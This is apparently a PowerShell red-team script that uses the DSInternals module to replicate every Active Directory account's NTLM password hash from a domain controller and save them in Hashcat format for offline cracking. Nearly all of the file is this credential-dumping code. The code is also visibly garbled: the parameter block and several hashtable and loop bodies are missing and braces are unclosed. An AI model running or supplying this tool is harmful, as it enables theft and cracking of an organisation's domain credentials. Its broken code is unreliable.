
.GUID ff919e16-8346-42ed-8cc9-88abdfebf806
.AUTHOR Kalichuza

#Requires -Module DSInternals

 RedTeam Tool that utilizes DSInternals module to extract user domain password hashes.

param (

Import-Module DSInternals

try {
    # Extract NTLM hashes and convert them to hexadecimal format
    $accounts = Get-ADReplAccount -All -Server $DomainController | Where-Object { $_.NTHash } | ForEach-Object {
        $hashHex = ($_.NTHash | ForEach-Object { $_.ToString("X2") }) -join ''
            SamAccountName = $_.SamAccountName
            NTHashHex = $hashHex

    # Check if the HashCat switch is used
    if ($HashCat) {
        # Path to save the output for Hashcat
        $outputPath = "hashcat_ntlm_hashes.txt"
        # Check if IncludeUsernames switch is used and prepare output accordingly
        if ($IncludeUsernames) {
            $accounts | ForEach-Object {
            } | Out-File -FilePath $outputPath -Encoding ASCII
        } else {
            $accounts | ForEach-Object {
            } | Out-File -FilePath $outputPath -Encoding ASCII
        Write-Host "Hashes have been saved to $outputPath in Hashcat format."
    } else {
        # Display the output in a table format if the HashCat switch is not used
        $accounts | Format-Table -AutoSize
} catch {
    Write-Host "An error occurred: $_"